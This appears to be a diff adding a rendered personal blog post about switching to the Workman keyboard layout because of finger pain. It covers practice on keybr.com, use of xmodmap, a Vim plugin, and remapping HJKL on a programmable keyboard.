+   3. https://nickpunt.com/blog/deescalating-social-media/
+   4. https://reddit.com/r/2meirl4meirl
+   5. https://icyphox.sh/home/icy/leet/site/build/blog/twitter/temp.html#fn:2

@@ -0,0 +1,93 @@ 
+   24 October, 2020
+
+The Workman keyboard layout
+
+I have a lot of free time on my hands (heh)
+
+   I've been at my computer everyday, for at least 10 hours at minimum.
+   These past ~6 - 7 months have been the most I've ever used my computer.
+   Eventually, I started experiencing discomfort and pain -- especially in
+   my pinkie finger. Typing became a chore, and I found myself using my
+   shell's command history more just to avoid typing commands. I tried
+   using a wrist rest, different keyboard heights, but nothing helped.
+
+   Thus began my search for a new keyboard layout, and it swiftly
+   concluded once I chanced upon the [1]Workman layout. According to the
+   website, it is supposedly an improvement over Colemak and Dvorak. I
+   skimmed through the numbers and other stats, but I honestly didn't
+   care. "Oh it's better than the popular alternative layouts? Okay that's
+   enough for me."
+
+   workman layout
+
+   I downloaded the tarball containing the different config files for
+   different platforms etc. I just needed the xmodmap -- that's the
+   easiest way to apply a keyboard layout.
+$ xmodmap xmodmap.workman
+
+   To practice the layout, I used [2]keybr.com. You can configure the
+   keyboard layout via the settings. Naturally, the first few days were
+   incredibly painful. I was only able to type short sentences with very
+   small words. I tried to not engage in heated discussions on IRC, for I
+   could not type up a response in time. However, if I did stumble into
+   one, I would switch back to QWERTY just for those couple of messages.
+
+   I found myself making the switch less and less, over the next few days.
+   Chatting on IRC is a great way to learn a layout. Or chatting anywhere,
+   really. It forces you to get accustomed to the layout by typing the
+   common words used in conversation. I also made a tiny change to the
+   layout -- swapping the F and B keys, since typing the "fo" / "of"
+   digram in the same hand felt really weird. Soon enough, I was averaging
+   about 30 - 40 WPM within the first week of having switched to Workman.
+
+   And then things at work started to pick up, and I had to do what I had
+   been dreading the most: edit code -- in Vim. It's fairly common
+   knowledge that Vim, by default, extensively uses the H, J, K and L keys
+   for navigation. Sure, there are better ways to move around and only
+   using those keys is frowned upon -- but it's a habit built over years,
+   and hard to shake off. After poking around for a bit, I found the
+   [3]vim-workman plugin. Forked it to apply the F/B change, and I began
+   using it.
+
+   It was great at first. My Vim muscle memory was not hampered, as I was
+   able to use QWERTY in normal mode, and Workman in insert. But as I got
+   better at Workman, I found myself instinctively reaching for the
+   Workman keys in normal mode. Well, everything except for the H, J, K
+   and L keys. This quickly became bothersome and I uninstalled the plugin
+   to search for a better solution.
+
+   Wait, don't I have a sick new [4]programmable mechanical keyboard? What
+   if I configure a layer on it just for the H, J, K, L keys? After
+   pouring through the manual for a bit, I eventually got it set up. I
+   even remapped the Caps Lock key to Fn so it's easier to access the
+   layer. So now, hitting Caps Lock+Y/N/E/O results in HJKL being pressed.
+   This took a little bit of getting used to, but it got easier with a bit
+   of practice.
+
+   Since I don't rely on any plugin/remappings, I can use Vim as is on
+   remote machines too. Another bonus from this adventure was I actually
+   spent time learning better ways to navigate, and reduce my reliance on
+   HJKL. Overall, a big win.
+
+   It's been over 4 weeks since my switch, I think, and I'm comfortably
+   averaging around 80 WPM. Still a good 20 WPM slower than QWERTY, but I
+   think it'll get better with time. And am I still able to use QWERTY?
+   Well, kinda. I still use QWERTY on my phone keyboard, since Workman
+   isn't an option on it and it's actually alright. However, when I use my
+   desktop to play Dota, I prefer using voice chat to communicate since
+   typing on QWERTY takes too long -- I am forced to hunt and peck.
+   Interestingly, after about 15 - 20 minutes on QWERTY, my brain kinda
+   just clicks back and I can type on it with relative ease. Not as fast
+   as I used to be, but it's manageable.
+
+   All things considered, switching to Workman was one of the better
+   decisions I have made in life. It feels so nice to be able to type out
+   whole words in just the home row. It just flows so nicely, and it has
+   made typing so much more enjoyable again.
+
+References
+
+   1. https://workmanlayout.org/
+   2. https://keybr.com/
+   3. https://github.com/nicwest/vim-workman
+   4. https://icyphox.sh/blog/ducky-one-2